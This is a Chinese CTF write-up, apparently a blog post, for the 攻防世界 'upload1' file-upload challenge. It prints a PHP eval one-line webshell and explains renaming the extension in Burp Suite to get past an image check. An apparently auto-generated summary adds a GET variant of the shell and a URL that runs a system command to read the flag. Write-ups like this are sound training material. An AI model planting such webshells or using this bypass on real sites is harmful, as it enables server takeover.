攻防世界:upload1

看了场景后,发现是需要上传一个文件,随意上传一个文件后,提示需要上传一个图片文件。

这种情况一般是一句话木马,因为写一句话木马的文件是php,所以上传后需要burpsuite修改包后缀名为jpg,最后用场景网站文件位置利用中国蚁剑连接。

首先构造我们的一句话木马:

<?php
@eval($_POST['attack']);
?>

将文件格式改成jpg,然后上传。

上传后,打开burpsuite。

将图中jpg改为php

最后forward。

接下来看见upload success : upload/1699281482.一句话木马.php后,打开中国蚁剑,添加数据。

如图所示。

最后双击web段,就可以在文档中找到flag。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
根据提供的引用内容,可以得知ctf upload1是一个CTF比赛中的一个上传功能。通过上传文件,可以执行一句话木马来获取flag。具体步骤如下: 1. 首先,需要找到一句话木马的代码。根据引用\[1\]中的内容,可以得到一句话木马的代码为`<?php @eval($_GET\['attack'\]); ?>`。 2. 接下来,需要构造一个GET请求,将一句话木马的代码作为参数传递给服务器。根据引用\[2\]中的内容,可以得到请求的URL为`http://111.200.241.244:54118/upload/1637599461.2.php?attack=system('cat /var/www/html/flag.php');`。这个请求会执行`system('cat /var/www/html/flag.php')`命令,将flag.php文件的内容返回。 3. 最后,发送该请求,即可获取flag。请注意,这个请求需要在合适的环境下进行,且仅供学习和研究使用。 总结起来,ctf upload1是一个上传功能,通过上传文件执行一句话木马来获取flag。具体步骤是构造一个GET请求,将一句话木马的代码作为参数传递给服务器,然后执行相应的命令获取flag。 #### 引用[.reference_title] - *1* *2* *3* [XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值